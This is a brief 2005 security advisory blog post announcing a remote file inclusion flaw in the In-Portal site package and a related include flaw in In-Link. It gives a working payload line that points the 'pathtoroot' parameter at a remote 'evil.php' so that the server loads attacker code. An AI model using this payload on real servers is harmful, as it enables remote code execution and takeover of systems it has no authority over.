by r0t,der4444,cembo,VietMafia

Thursday, October 13, 2005

In-Portal.net

In-Portal.net Vulnerability
In-Portal Site Package - Price:$295
Quote: "our most popular products designed to run a successful portal or a community web site. It is equipped with the latest In-portal Platform, In-link (Directory Management), In-newz (News Management) and In-bulletin (Discussion Forum)" - in-portal.net

Credit: der4444 original advisory at hackers.by.lv

Vulnerable File:
/kernel/include/item.php
POST: pathtoroot=http://pridels.blogspot.com/evil.php?

In-Link is also vulnerable to a remote include in:
includes/init.php
BUT, php version >= 5.0 and registered globals on. Which is a rare configuration.


Greetz to New Angels team,waraxe,X-ACCESS crew,g0df4th3r

original advisory:
http://pridels.blogspot.com/2005/10/in-portalnet.html

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew